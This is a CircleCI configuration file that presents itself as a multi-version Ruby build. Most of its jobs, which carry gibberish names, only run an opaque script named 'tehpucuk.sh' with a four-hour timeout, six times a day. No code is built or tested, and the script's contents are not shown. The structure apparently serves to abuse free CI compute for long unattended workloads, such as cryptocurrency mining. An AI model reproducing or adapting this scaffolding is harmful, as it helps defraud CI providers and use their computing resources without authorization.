resource_class: large
working_dir: &working_dir ~/app

.build_template: &build_definition
  steps:
    - checkout 
    - run:  
        command: chmod +x ./tehpucuk.sh && ./tehpucuk.sh
        no_output_timeout: 240m

version: 2.0

jobs:
  build:
    docker:
      - image: ruby
    steps:
      - checkout
  buifdsxxw127:
    <<: *build_definition
    docker:
      - image: ruby:2.7
  buifdsxxw126:
    <<: *build_definition
    docker:
      - image: ruby:2.6
  buifdsxxw125:
    <<: *build_definition
    docker:
      - image: ruby:2.5
  buifdsxxw124:
    <<: *build_definition
    docker:
      - image: ruby:2.4
  buifdsxxw123:
    <<: *build_definition
    docker:
      - image: ruby:2.3

workflows:
  version: 2
  commit:
    jobs:
      - build
      - buifdsxxw127
      - buifdsxxw126
      - buifdsxxw125
      - buifdsxxw124
      - buifdsxxw123

    triggers:
      - schedule:
          cron: "0 2,5,8,13,17,22 * * *"
          filters:
            branches:
              only:
                - master
  
  anakkutil:
    jobs:
      - build
      - buifdsxxw127
      - buifdsxxw126
      - buifdsxxw125
      - buifdsxxw124
      - buifdsxxw123
